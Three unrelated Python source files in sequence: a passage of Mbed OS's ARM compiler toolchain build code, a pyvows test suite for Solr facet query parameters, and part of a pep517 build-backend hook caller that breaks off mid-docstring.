.format(min_ver, max_ver))
if msg:
self.notify.cc_info({
"message": msg,
"file": "",
"line": "",
"col": "",
"severity": "WARNING",
})
msg = None
match = self.ARMCC_PRODUCT_RE.search(output)
if match:
self.product_name = match.group(1).decode("utf-8")
else:
self.product_name = None
if not match or len(match.groups()) != 1:
msg = (
"Could not detect product name: defaulting to professional "
"version of ARMC6"
)
def _get_toolchain_labels(self):
if getattr(self.target, "default_toolchain", "ARM") == "uARM":
return ["ARM", "ARM_MICRO", "ARMC5"]
else:
return ["ARM", "ARM_STD", "ARMC5"]
def parse_dependencies(self, dep_path):
dependencies = []
for line in open(dep_path).readlines():
match = ARM.DEP_PATTERN.match(line)
if match is not None:
# we need to append chroot, because when the .d files are
# generated the compiler is chrooted
dependencies.append(
(self.CHROOT if self.CHROOT else '') + match.group('file')
)
return dependencies
def parse_output(self, output):
msg = None
for line in output.splitlines():
match = self.DIAGNOSTIC_PATTERN.match(line)
if match is not None:
if msg is not None:
self.notify.cc_info(msg)
msg = None
msg = {
'severity': match.group('severity').lower(),
'file': match.group('file'),
'line': match.group('line'),
'message': match.group('message'),
'text': '',
'target_name': self.target.name,
'toolchain_name': self.name
}
if match.group('column'):
msg['col'] = match.group('column')
else:
msg['col'] = 0
elif msg is not None:
# Determine the warning/error column by calculating the '^'
# position
match = ARM.INDEX_PATTERN.match(line)
if match is not None:
msg['col'] = len(match.group('col'))
self.notify.cc_info(msg)
msg = None
else:
msg['text'] += line+"\n"
if msg is not None:
self.notify.cc_info(msg)
def get_dep_option(self, object):
base, _ = splitext(object)
dep_path = base + '.d'
return ["--depend", dep_path]
def get_config_option(self, config_header):
return ['--preinclude=' + config_header]
def get_compile_options(self, defines, includes, for_asm=False):
opts = ['-D%s' % d for d in defines]
config_header = self.get_config_header()
if config_header is not None:
opts = opts + self.get_config_option(config_header)
if for_asm:
return opts
if self.RESPONSE_FILES:
opts += ['--via', self.get_inc_file(includes)]
else:
opts += ["-I%s" % i for i in includes if i]
return opts
def assemble(self, source, object, includes):
# Preprocess first, then assemble
dir = join(dirname(object), '.temp')
mkdir(dir)
tempfile = join(dir, basename(object) + '.E.s')
# Build preprocess assemble command
cmd_pre = copy(self.asm)
cmd_pre.extend(self.get_compile_options(
self.get_symbols(True), includes, True))
cmd_pre.extend(["-E", "-o", tempfile, source])
# Build main assemble command
cmd = self.asm + ["-o", object, tempfile]
# Return command array, don't execute
return [cmd_pre, cmd]
def compile(self, cc, source, object, includes):
# Build compile command
cmd = cc + self.get_compile_options(self.get_symbols(), includes)
cmd.extend(self.get_dep_option(object))
cmd.extend(["-o", object, source])
return [cmd]
def compile_c(self, source, object, includes):
return self.compile(self.cc, source, object, includes)
def compile_cpp(self, source, object, includes):
return self.compile(self.cppc, source, object, includes)
def correct_scatter_shebang(self, sc_fileref, cur_dir_name=None):
"""Correct the shebang at the top of a scatter file.
The shebang line is the line at the top of the file starting with '#!'. If this line is present
then the linker will execute the command on that line on the content of the scatter file prior
to consuming the content into the link. Typically the shebang line will contain an instruction
to run the C-preprocessor (either 'armcc -E' or 'armclang -E') which allows for macro expansion,
inclusion of headers etc. Other options are passed to the preprocessor to specify aspects of the
system such as the processor architecture and cpu type.
The build system (at this point) will have constructed what it considers to be a correct shebang
line for this build. If this differs from the line in the scatter file then the scatter file
will be rewritten by this function to contain the build-system-generated shebang line. Note
that the rewritten file will be placed in the BUILD output directory.
Include processing
If the scatter file runs the preprocessor, and contains #include statements then the pre-processor
include path specifies where the #include files are to be found. Typically, #include files
are specified with a path relative to the location of the original scatter file. When the
preprocessor runs, the system automatically passes the location of the scatter file into the
include path through an implicit '-I' option to the preprocessor, and this works fine in the
offline build system.
Unfortunately this approach does not work in the online build, because the preprocessor
command runs in a chroot. The true (non-chroot) path to the file as known by the build system
looks something like this:
/tmp/chroots/ch-eefd72fb-2bcb-4e99-9043-573d016618bb/extras/mbed-os.lib/...
whereas the path known by the preprocessor will be:
/extras/mbed-os.lib/...
Consequently, the chroot path has to be explicitly passed to the preprocessor through an
explicit -I/path/to/chroot/file option in the shebang line.
*** THERE IS AN ASSUMPTION THAT THE CHROOT PATH IS THE REAL FILE PATH WITH THE FIRST
*** THREE ELEMENTS REMOVED. THIS ONLY HOLDS TRUE UNTIL THE ONLINE BUILD SYSTEM CHANGES
If the include path manipulation as described above does change, then any scatter file
containing a #include statement is likely to fail on the online compiler.
Positional arguments:
sc_fileref -- FileRef object of the scatter file
Keyword arguments:
cur_dir_name -- the name (not path) of the directory containing the
scatter file
Return:
The FileRef of the correct scatter file
Side Effects:
This method MAY write a new scatter file to disk
"""
with open(sc_fileref.path, "r") as input:
lines = input.readlines()
# If the existing scatter file has no shebang line, or the line that it does have
# matches the desired line then the existing scatter file is used directly without rewriting.
if (lines[0].startswith(self.SHEBANG) or
not lines[0].startswith("#!")):
return sc_fileref
new_scatter = join(self.build_dir, ".link_script.sct")
if cur_dir_name is None:
cur_dir_name = dirname(sc_fileref.path)
# For a chrooted system, adjust the path to the scatter file to be a valid
# chroot location by removing the first three elements of the path.
if cur_dir_name.startswith("/tmp/chroots"):
cur_dir_name = sep + join(*(cur_dir_name.split(sep)[4:]))
# Add the relocated scatter file path to the include path.
self.SHEBANG += " -I%s" % cur_dir_name
# Only rewrite if doing a full build...
if self.need_update(new_scatter, [sc_fileref.path]):
with open(new_scatter, "w") as out:
# Write the new shebang line...
out.write(self.SHEBANG + "\n")
# ...followed by the unmolested remaining content from the original scatter file.
out.write("".join(lines[1:]))
return FileRef(".link_script.sct", new_scatter)
def get_link_command(
self,
output,
objects,
libraries,
lib_dirs,
scatter_file
):
base, _ = splitext(output)
map_file = base + ".map"
args = ["-o", output, "--info=totals", "--map", "--list=%s" % map_file]
args.extend(objects)
args.extend(libraries)
if lib_dirs:
args.extend(["--userlibpath", ",".join(lib_dirs)])
if scatter_file:
scatter_name = relpath(scatter_file)
new_scatter = self.correct_scatter_shebang(FileRef(scatter_name, scatter_file))
args.extend(["--scatter", new_scatter.path])
cmd = self.ld + args
if self.RESPONSE_FILES:
cmd_linker = cmd[0]
link_files = self.get_link_file(cmd[1:])
cmd = [cmd_linker, '--via', link_files]
return cmd
def link(self, output, objects, libraries, lib_dirs, scatter_file):
cmd = self.get_link_command(
output, objects, libraries, lib_dirs, scatter_file
)
self.notify.cc_verbose("Link: %s" % ' '.join(cmd))
self.default_cmd(cmd)
def archive(self, objects, lib_path):
if self.RESPONSE_FILES:
param = ['--via', self.get_arch_file(objects)]
else:
param = objects
self.default_cmd([self.ar, '-r', lib_path] + param)
def get_binary_commands(self, bin_arg, bin, elf):
return [self.elf2bin, bin_arg, '-o', bin, elf]
def binary(self, resources, elf, bin):
_, fmt = splitext(bin)
# On .hex format, combine multiple .hex files (for multiple load
# regions) into one
bin_arg = {".bin": "--bin", ".hex": "--i32combined"}[fmt]
cmd = self.get_binary_commands(bin_arg, bin, elf)
# remove target binary file/path
if exists(bin):
if isfile(bin):
remove(bin)
else:
rmtree(bin)
self.notify.cc_verbose("FromELF: %s" % ' '.join(cmd))
self.default_cmd(cmd)
@staticmethod
def name_mangle(name):
return "_Z%i%sv" % (len(name), name)
@staticmethod
def make_ld_define(name, value):
return "--predefine=\"-D%s=%s\"" % (name, value)
@staticmethod
def redirect_symbol(source, sync, build_dir):
if not exists(build_dir):
makedirs(build_dir)
handle, filename = mkstemp(prefix=".redirect-symbol.", dir=build_dir)
write(handle, "RESOLVE %s AS %s\n" % (source, sync))
return "--edit=%s" % filename
class ARM_STD(ARM):
OFFICIALLY_SUPPORTED = True
def __init__(
self,
target,
notify=None,
macros=None,
build_profile=None,
build_dir=None,
coverage_patterns=None
):
ARM.__init__(
self,
target,
notify,
macros,
build_dir=build_dir,
build_profile=build_profile,
coverage_patterns=None
)
if int(target.build_tools_metadata["version"]) > 0:
# check only for ARMC5 because ARM_STD means using ARMC5, and thus
# supported_toolchains must include ARMC5
if not set(target.supported_toolchains).intersection(
set(("ARMC5", "ARM"))
):
raise NotSupportedException(
"ARM compiler 5 support is required for ARM build"
)
else:
if not set(("ARM", "uARM")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/uARM compiler support is required for ARM build"
)
class ARM_MICRO(ARM):
PATCHED_LIBRARY = False
OFFICIALLY_SUPPORTED = True
def __init__(
self,
target,
notify=None,
macros=None,
silent=False,
extra_verbose=False,
build_profile=None,
build_dir=None,
coverage_patterns=None,
):
target.default_toolchain = "uARM"
if int(target.build_tools_metadata["version"]) > 0:
# At this point we already know that we want to use ARMC5+Microlib
# so check for if they are supported For, AC6+Microlib we still
# use ARMC6 class
if not set(("ARMC5", "uARM")).issubset(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/uARM compiler support is required for ARM build"
)
else:
if not set(("ARM", "uARM")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/uARM compiler support is required for ARM build"
)
ARM.__init__(
self,
target,
notify,
macros,
build_dir=build_dir,
build_profile=build_profile
)
class ARMC6(ARM_STD):
OFFICIALLY_SUPPORTED = False
SHEBANG = "#! armclang -E --target=arm-arm-none-eabi -x c"
SUPPORTED_CORES = [
"Cortex-M0", "Cortex-M0+", "Cortex-M3", "Cortex-M4",
"Cortex-M4F", "Cortex-M7", "Cortex-M7F", "Cortex-M7FD",
"Cortex-M23", "Cortex-M23-NS", "Cortex-M33", "Cortex-M33F",
"Cortex-M33-NS", "Cortex-M33F-NS", "Cortex-M33FE-NS", "Cortex-M33FE",
"Cortex-A5", "Cortex-A9"
]
ARMCC_RANGE = (LooseVersion("6.10"), LooseVersion("7.0"))
LD_DIAGNOSTIC_PATTERN = re.compile(
'(?P<severity>Warning|Error): (?P<message>.+)'
)
DIAGNOSTIC_PATTERN = re.compile('((?P<file>[^:]+):(?P<line>\d+):)(?P<col>\d+):? (?P<severity>warning|[eE]rror|fatal error): (?P<message>.+)')
@staticmethod
def check_executable():
return mbedToolchain.generic_check_executable("ARMC6", "armclang", 1)
def __init__(self, target, *args, **kwargs):
mbedToolchain.__init__(self, target, *args, **kwargs)
if target.core not in self.SUPPORTED_CORES:
raise NotSupportedException(
"this compiler does not support the core %s" % target.core)
if int(target.build_tools_metadata["version"]) > 0:
if not set(("ARM", "ARMC6", "uARM")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/ARMC6 compiler support is required for ARMC6 build"
)
else:
if not set(("ARM", "ARMC6")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/ARMC6 compiler support is required for ARMC6 build"
)
toolchain = "arm"
if should_replace_small_c_lib(target, toolchain):
target.c_lib = "std"
self.check_c_lib_supported(target, toolchain)
if (
getattr(target, "default_toolchain", "ARMC6") == "uARM"
or getattr(target, "c_lib", "std") == "small"
):
if "-DMBED_RTOS_SINGLE_THREAD" not in self.flags['common']:
self.flags['common'].append("-DMBED_RTOS_SINGLE_THREAD")
if "-D__MICROLIB" not in self.flags['common']:
self.flags['common'].append("-D__MICROLIB")
if "--library_type=microlib" not in self.flags['ld']:
self.flags['ld'].append("--library_type=microlib")
if "--library_type=microlib" not in self.flags['asm']:
self.flags['asm'].append("--library_type=microlib")
self.check_and_add_minimal_printf(target)
if target.is_TrustZone_non_secure_target:
# Add linking time preprocessor macro DOMAIN_NS
# (DOMAIN_NS is passed to compiler and assembler via CORTEX_SYMBOLS
# in mbedToolchain.get_symbols)
define_string = self.make_ld_define("DOMAIN_NS", "0x1")
self.flags["ld"].append(define_string)
core = target.core_without_NS
cpu = {
"Cortex-M0+": "cortex-m0plus",
"Cortex-M4F": "cortex-m4",
"Cortex-M7F": "cortex-m7",
"Cortex-M7FD": "cortex-m7",
"Cortex-M33": "cortex-m33+nodsp",
"Cortex-M33F": "cortex-m33+nodsp",
"Cortex-M33E": "cortex-m33",
"Cortex-M33FE": "cortex-m33"}.get(core, core)
cpu = cpu.lower()
self.flags['common'].append("-mcpu=%s" % cpu)
self.SHEBANG += " -mcpu=%s" % cpu
# FPU handling
if core in ["Cortex-M4", "Cortex-M7", "Cortex-M33", "Cortex-M33E"]:
self.flags['common'].append("-mfpu=none")
elif core == "Cortex-M4F":
self.flags['common'].append("-mfpu=fpv4-sp-d16")
self.flags['common'].append("-mfloat-abi=hard")
elif core == "Cortex-M7F" or core.startswith("Cortex-M33F"):
self.flags['common'].append("-mfpu=fpv5-sp-d16")
self.flags['common'].append("-mfloat-abi=hard")
elif core == "Cortex-M7FD":
self.flags['common'].append("-mfpu=fpv5-d16")
self.flags['common'].append("-mfloat-abi=hard")
asm_ld_cpu = {
"Cortex-M0+": "Cortex-M0plus",
"Cortex-M4": "Cortex-M4.no_fp",
"Cortex-M4F": "Cortex-M4",
"Cortex-M7": "Cortex-M7.no_fp",
"Cortex-M7F": "Cortex-M7.fp.sp",
"Cortex-M7FD": "Cortex-M7",
"Cortex-M33": "Cortex-M33.no_dsp.no_fp",
"Cortex-M33E": "Cortex-M33.no_fp",
"Cortex-M33F": "Cortex-M33.no_dsp",
"Cortex-M33FE": "Cortex-M33"}.get(core, core)
self.flags['asm'].append("--cpu=%s" % asm_ld_cpu)
self.flags['ld'].append("--cpu=%s" % asm_ld_cpu)
self.cc = ([join(TOOLCHAIN_PATHS["ARMC6"], "armclang")] +
self.flags['common'] + self.flags['c'])
self.cppc = ([join(TOOLCHAIN_PATHS["ARMC6"], "armclang")] +
self.flags['common'] + self.flags['cxx'])
self.asm = [join(TOOLCHAIN_PATHS["ARMC6"], "armasm")]
self.asm += self.flags['asm']
self.ld = [join(TOOLCHAIN_PATHS["ARMC6"], "armlink")]
self.ld += self.flags['ld']
self.ar = join(TOOLCHAIN_PATHS["ARMC6"], "armar")
self.elf2bin = join(TOOLCHAIN_PATHS["ARMC6"], "fromelf")
# Adding this for safety since this inherits the `version_check`
# function but does not call the constructor of ARM_STD, so the
# `product_name` variable is not initialized.
self.product_name = None
def _get_toolchain_labels(self):
if getattr(self.target, "default_toolchain", "ARM") == "uARM":
return ["ARM", "ARM_MICRO", "ARMC6"]
else:
return ["ARM", "ARM_STD", "ARMC6"]
@property
def is_mbed_studio_armc6(self):
return self.product_name and "Mbed Studio" in self.product_name
def parse_dependencies(self, dep_path):
return mbedToolchain.parse_dependencies(self, dep_path)
def is_not_supported_error(self, output):
return "#error [NOT_SUPPORTED]" in output
def parse_output(self, output):
for line in output.splitlines():
match = self.LD_DIAGNOSTIC_PATTERN.match(line)
if match is not None:
self.notify.cc_info({
'severity': match.group('severity').lower(),
'message': match.group('message'),
'text': '',
'target_name': self.target.name,
'toolchain_name': self.name,
'col': 0,
'file': "",
'line': 0
})
match = self.DIAGNOSTIC_PATTERN.search(line)
if match is not None:
self.notify.cc_info({
'severity': match.group('severity').lower(),
'file': match.group('file'),
'line': match.group('line'),
'col': match.group('col'),
'message': match.group('message'),
'text': '',
'target_name': self.target.name,
'toolchain_name': self.name
})
def get_config_option(self, config_header):
return ["-include", config_header]
def get_compile_options(self, defines, includes, for_asm=False):
opts = ['-D%s' % d for d in defines]
if self.RESPONSE_FILES:
opts += ['@{}'.format(self.get_inc_file(includes))]
else:
opts += ["-I%s" % i for i in includes if i]
config_header = self.get_config_header()
if config_header:
opts.extend(self.get_config_option(config_header))
if for_asm:
opts = [
"--cpreproc",
"--cpreproc_opts=%s" % ",".join(self.flags['common'] + opts)
]
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
opts.insert(0, "--ide=mbed")
return opts
def assemble(self, source, object, includes):
# Preprocess first, then assemble
root, _ = splitext(object)
tempfile = root + '.E'
# Build preprocess assemble command
cmd_pre = copy(self.cc)
cmd_pre.extend(self.get_compile_options(
self.get_symbols(True), includes, for_asm=False))
cmd_pre.extend(["-E", "-MT", object, "-o", tempfile, source])
# Build main assemble command
cmd = self.asm + ["-o", object, tempfile]
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
cmd.insert(1, "--ide=mbed")
# Return command array, don't execute
return [cmd_pre, cmd]
def compile(self, cc, source, object, includes):
cmd = copy(cc)
cmd.extend(self.get_compile_options(self.get_symbols(), includes))
cmd.extend(["-o", object, source])
return [cmd]
def get_link_command(
self,
output,
objects,
libraries,
lib_dirs,
scatter_file
):
cmd = ARM.get_link_command(
self, output, objects, libraries, lib_dirs, scatter_file
)
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
cmd.insert(1, "--ide=mbed")
return cmd
def get_binary_commands(self, bin_arg, bin, elf):
cmd = ARM.get_binary_commands(self, bin_arg, bin, elf)
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
cmd.insert(1, "--ide=mbed")
return cmd
|
|
# vim: set fileencoding=utf-8 :
#
# Copyright (c) 2012 Retresco GmbH
# Copyright (c) 2011 Daniel Truemper <truemped at googlemail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
from pyvows import Vows, expect
from dopplr.solr.query.facets import FacetFieldQuery
from dopplr.solr.query.facets import FacetQueryQuery
from dopplr.solr.query.facets import MultiselectFacetQuery
from dopplr.solr.query.facets import RangeFacetQuery
@Vows.batch
class FacettingQueries(Vows.Context):
class WithASimpleFacet(Vows.Context):
def topic(self):
q = FacetFieldQuery('foo')
return q.get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', 'foo'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(2)
class WithAMinCountParameter(WithASimpleFacet):
def topic(self):
q = FacetFieldQuery('foo', mincount=1)
return q.get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
def FacetMincountMustBeCorrect(self, topic):
expect(topic).to_include(('f.foo.facet.mincount', '1'))
class WithAFacetValue(WithASimpleFacet):
def topic(self):
q = FacetFieldQuery('foo', value='bar')
return q.get_params()
def theFilterQueryMustBeCreated(self, topic):
expect(topic).to_include(('fq', '{!tag=foo}foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithAFacetValueAndWithoutATag(WithASimpleFacet):
def topic(self):
q = FacetFieldQuery('foo', value='bar', tag=False)
return q.get_params()
def theFilterQueryMustBeCreated(self, topic):
expect(topic).to_include(('fq', 'foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithASortParameter(WithAFacetValue):
def topic(self):
q = FacetFieldQuery('foo', value='bar', sort='count')
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.sort', 'count'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(4)
class WithMissingParams(WithAFacetValue):
def topic(self):
q = FacetFieldQuery('foo', value='bar', sort='count', missing=1)
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.missing', '1'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(5)
@Vows.batch
class MultiSelectFacettingQueries(Vows.Context):
class WithASimpleFacet(Vows.Context):
def topic(self):
q = MultiselectFacetQuery('foo')
return q.get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', 'foo'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(2)
class WithAMinCountParameter(WithASimpleFacet):
def topic(self):
q = MultiselectFacetQuery('foo', mincount=1)
return q.get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
def FacetMincountMustBeCorrect(self, topic):
expect(topic).to_include(('f.foo.facet.mincount', '1'))
class WithAFacetValue(WithASimpleFacet):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar')
return q.get_params()
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', '{!ex=foo}foo'))
def theFilterQueryMustBeCreated(self, topic):
expect(topic).to_include(('fq', '{!tag=foo}foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithAFacetValueAndWithoutATag(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar', tag=False)
return q.get_params()
def theFilterQueryMustBeCreated(self, topic):
expect(topic).Not.to_include(('fq', 'foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithASortParameter(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar', sort='count')
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.sort', 'count'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(4)
class WithMissingParams(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar', sort='count',
missing=1)
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.missing', '1'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(5)
class WithAdditionalExcludes(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar',
additional_excludes=['test'])
return q.get_params()
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', '{!ex=test,foo}foo'))
@Vows.batch
class ARangeFacetQuery(Vows.Context):
class WithRequiredParams(Vows.Context):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10).get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.range', 'foo'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(5)
def theStartParameterEquals(self, topic):
expect(topic).to_include(('f.foo.facet.range.start', '1'))
def theGapParameterEquals(self, topic):
expect(topic).to_include(('f.foo.facet.range.gap', '2'))
def theEndParameterEquals(self, topic):
expect(topic).to_include(('f.foo.facet.range.end', '10'))
class WithAValue(WithRequiredParams):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10, value=5).get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theFqMustEqual(self, topic):
expect(topic).to_include(('fq', '{!tag=foo}foo:5'))
class WithAValueAndWithoutATag(WithAValue):
def topic(self):
q = RangeFacetQuery('foo', 1, 2, 10, value=5, tag=False)
return q.get_params()
def theFqMustEqual(self, topic):
expect(topic).to_include(('fq', 'foo:5'))
class WithAHardenedParam(WithRequiredParams):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10, hardened=True).get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theHardenedParamMatches(self, topic):
expect(topic).to_include(('f.foo.facet.range.hardened', True))
class WithAOtherParameter(WithRequiredParams):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10, other='after').get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theOtherParamMatches(self, topic):
expect(topic).to_include(('f.foo.facet.range.other', 'after'))
class WithAnIncludeParameter(WithRequiredParams):
def topic(self):
q = RangeFacetQuery('foo', 1, 2, 10, include='all')
return q.get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theOtherParamMatches(self, topic):
expect(topic).to_include(('f.foo.facet.range.include', 'all'))
@Vows.batch
class AFacetQueryQuery(Vows.Context):
class WithRequireParams(Vows.Context):
def topic(self):
return FacetQueryQuery('title:Test').get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetQueryMustBeCorrect(self, topic):
expect(topic).to_include(('facet.query', 'title:Test'))
class WithExcludedFilterQueries(WithRequireParams):
def topic(self):
q = FacetQueryQuery('title:Test', excludeFqs=['test', 'tag'])
return q.get_params()
def facetQueryMustBeCorrect(self, topic):
expect(topic).to_include(('facet.query',
'{!ex=test,tag}title:Test'))
|
|
import threading
from contextlib import contextmanager
import os
from os.path import abspath, join as pjoin
import shutil
from subprocess import check_call, check_output, STDOUT
import sys
from tempfile import mkdtemp
from . import compat
from .in_process import _in_proc_script_path
__all__ = [
'BackendUnavailable',
'BackendInvalid',
'HookMissing',
'UnsupportedOperation',
'default_subprocess_runner',
'quiet_subprocess_runner',
'Pep517HookCaller',
]
@contextmanager
def tempdir():
td = mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
class BackendUnavailable(Exception):
"""Will be raised if the backend cannot be imported in the hook process."""
def __init__(self, traceback):
self.traceback = traceback
class BackendInvalid(Exception):
"""Will be raised if the backend is invalid."""
def __init__(self, backend_name, backend_path, message):
self.backend_name = backend_name
self.backend_path = backend_path
self.message = message
class HookMissing(Exception):
"""Will be raised on missing hooks."""
def __init__(self, hook_name):
super(HookMissing, self).__init__(hook_name)
self.hook_name = hook_name
class UnsupportedOperation(Exception):
"""May be raised by build_sdist if the backend indicates that it can't."""
def __init__(self, traceback):
self.traceback = traceback
def default_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""The default method of calling the wrapper subprocess."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_call(cmd, cwd=cwd, env=env)
def quiet_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""A method of calling the wrapper subprocess while suppressing output."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_output(cmd, cwd=cwd, env=env, stderr=STDOUT)
def norm_and_check(source_tree, requested):
"""Normalise and check a backend path.
Ensure that the requested backend path is specified as a relative path,
and resolves to a location under the given source tree.
Return an absolute version of the requested path.
"""
if os.path.isabs(requested):
raise ValueError("paths must be relative")
abs_source = os.path.abspath(source_tree)
abs_requested = os.path.normpath(os.path.join(abs_source, requested))
# We have to use commonprefix for Python 2.7 compatibility. So we
# normalise case to avoid problems because commonprefix is a character
# based comparison :-(
norm_source = os.path.normcase(abs_source)
norm_requested = os.path.normcase(abs_requested)
if os.path.commonprefix([norm_source, norm_requested]) != norm_source:
raise ValueError("paths must be inside source tree")
return abs_requested
class Pep517HookCaller(object):
"""A wrapper around a source directory to be built with a PEP 517 backend.
:param source_dir: The path to the source directory, containing
pyproject.toml.
:param build_backend: The build backend spec, as per PEP 517, from
pyproject.toml.
:param backend_path: The backend path, as per PEP 517, from pyproject.toml.
:param runner: A callable that invokes the wrapper subprocess.
:param python_executable: The Python executable used to invoke the backend
The 'runner', if provided, must expect the following:
- cmd: a list of strings representing the command and arguments to
execute, as would be passed to e.g. 'subprocess.check_call'.
- cwd: a string representing the working directory that must be
used for the subprocess. Corresponds to the provided source_dir.
- extra_environ: a dict mapping environment variable names to values
which must be set for the subprocess execution.
"""
def __init__(
self,
source_dir,
build_backend,
backend_path=None,
runner=None,
python_executable=None,
):
if runner is None:
runner = default_subprocess_runner
self.source_dir = abspath(source_dir)
self.build_backend = build_backend
if backend_path:
backend_path = [
norm_and_check(self.source_dir, p) for p in backend_path
]
self.backend_path = backend_path
self._subprocess_runner = runner
if not python_executable:
python_executable = sys.executable
self.python_executable = python_executable
@contextmanager
def subprocess_runner(self, runner):
"""A context manager for temporarily overriding the default subprocess
runner.
"""
prev = self._subprocess_runner
self._subprocess_runner = runner
try:
yield
finally:
self._subprocess_runner = prev
def _supported_features(self):
"""Return the list of optional features supported by the backend."""
return self._call_hook('_supported_features', {})
def get_requires_for_build_wheel(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.::
["wheel >= 0.25", "setuptools"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_wheel', {
'config_settings': config_settings
})
def prepare_metadata_for_build_wheel(
self, metadata_directory, config_settings=None,
_allow_fallback=True):
"""Prepare a ``*.dist-info`` folder with metadata for this project.
Returns the name of the newly created folder.
If the build backend defines a hook with this name, it will be called
in a subprocess. If not, the backend will be asked to build a wheel,
and the dist-info extracted from that (unless _allow_fallback is
False).
"""
return self._call_hook('prepare_metadata_for_build_wheel', {
'metadata_directory': abspath(metadata_directory),
'config_settings': config_settings,
'_allow_fallback': _allow_fallback,
})
def build_wheel(
self, wheel_directory, config_settings=None,
metadata_directory=None):
"""Build a wheel from this project.
Returns the name of the newly created file.
In general, this will call the 'build_wheel' hook in the backend.
However, if that was previously called by
'prepare_metadata_for_build_wheel', and the same metadata_directory is
used, the previously built wheel will be copied to wheel_directory.
"""
if metadata_directory is not None:
metadata_directory = abspath(metadata_directory)
return self._call_hook('build_wheel', {
'wheel_directory': abspath(wheel_directory),
'config_settings': config_settings,
'metadata_directory': metadata_directory,
})
def get_requires_for_build_editable(self, config_settings=None):
"""Identify packages required for building an editable wheel
Returns a list of dependency specifications, e.g.::
["wheel >= 0.25", "setuptools"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_editable', {
'config_settings': config_settings
})
def prepare_metadata_for_build_editable(
self, metadata_directory, config_settings=None,
_allow_fallback=True):
"""Prepare a ``*.dist-info`` folder with metadata for this project.
Returns the name of the newly created folder.
If the build backend defines a hook with this name, it will be called
in a subprocess. If not, the backend will be asked to build an editable
wheel, and the dist-info extracted from that (unless _allow_fallback is
False).
"""
return self._call_hook('prepare_metadata_for_build_editable', {
'metadata_directory': abspath(metadata_directory),
'config_settings': config_settings,
'_allow_fallback': _allow_fallback,
})
def build_editable(
self, wheel_directory, config_settings=None,
metadata_directory=None):
"""Build an editable wheel from this project.
Returns the name of the newly created file.
In general, this will call the 'build_editable' hook in the backend.
However, if that was previously called by
'prepare_metadata_for_build_editable', and the same metadata_directory
